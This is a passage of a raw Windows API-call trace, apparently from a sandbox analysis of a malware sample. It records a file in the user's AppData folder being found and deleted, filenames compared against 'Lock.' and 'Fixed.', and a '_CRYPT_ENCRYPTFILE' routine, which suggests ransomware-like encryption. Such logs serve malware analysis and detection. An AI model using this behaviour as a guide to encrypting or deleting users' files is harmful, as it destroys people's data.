lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0230.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.634] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0230.634] FreeLibrary (hLibModule=0x756e0000) returned 1 [0230.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0230.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0230.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0230.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.635] CloseHandle (hObject=0x2a0) returned 1 [0230.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0230.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0230.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.639] CloseHandle (hObject=0x2d0) returned 1 [0230.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0230.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.642] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.645] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.645] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.645] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/EQBMxAkSv-.pdf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\EQBMxAkSv-.pdf", lpFilePart=0x8cedf4*="EQBMxAkSv-.pdf") returned 0x2e [0230.645] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EQBMxAkSv-.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\eqbmxaksv-.pdf")) returned 0x20 [0230.645] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EQBMxAkSv-.pdf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd49fe790, ftCreationTime.dwHighDateTime=0x1d5ee3e, ftLastAccessTime.dwLowDateTime=0xd494fa00, ftLastAccessTime.dwHighDateTime=0x1d5e97b, ftLastWriteTime.dwLowDateTime=0xd494fa00, ftLastWriteTime.dwHighDateTime=0x1d5e97b, nFileSizeHigh=0x0, nFileSizeLow=0xd640, dwReserved0=0x1, dwReserved1=0x1c, cFileName="EQBMxAkSv-.pdf", cAlternateFileName="EQBMXA~1.PDF")) returned 0xa87590 [0230.645] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EQBMxAkSv-.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\eqbmxaksv-.pdf")) returned 1 [0230.689] FindNextFileW (in: hFindFile=0xa87590, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd49fe790, ftCreationTime.dwHighDateTime=0x1d5ee3e, ftLastAccessTime.dwLowDateTime=0xd494fa00, ftLastAccessTime.dwHighDateTime=0x1d5e97b, ftLastWriteTime.dwLowDateTime=0xd494fa00, ftLastWriteTime.dwHighDateTime=0x1d5e97b, nFileSizeHigh=0x0, nFileSizeLow=0xd640, dwReserved0=0x1, dwReserved1=0x1c, cFileName="EQBMxAkSv-.pdf", cAlternateFileName="EQBMXA~1.PDF")) returned 0 [0230.690] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0230.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0230.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0230.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0230.690] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.690] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0230.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0230.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0230.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e564e0 [0230.691] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/EQBMxAkSv-.pdf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\EQBMxAkSv-.pdf", lpFilePart=0x8cf650*="EQBMxAkSv-.pdf") returned 0x2e [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0230.691] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EQBMxAkSv-.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\eqbmxaksv-.pdf")) returned 0xffffffff [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0230.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0230.691] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0230.692] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.692] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0230.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0230.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0230.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FDKSrtwPMRhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DKSrtwPMRhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KSrtwPMRhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrtwPMRhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtwPMRhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="twPMRhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wPMRhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PMRhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MRhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rhz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hz2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PyeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yeAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eAx.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ax.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0230.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0230.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0230.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0230.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0230.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0230.693] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0230.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0230.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0230.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0230.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0230.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0230.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0230.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0230.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0230.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0230.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0230.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2f045e8 [0230.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FDKSrtwPMRhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DKSrtwPMRhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KSrtwPMRhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrtwPMRhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtwPMRhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="twPMRhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wPMRhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PMRhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MRhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rhz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hz2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PyeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yeAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eAx.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ax.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0230.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0230.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0230.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0230.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0230.695] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0230.696] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0230.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0230.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0230.696] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0230.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0230.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0230.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0230.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0230.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0230.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0230.697] RtlAllocateHeap 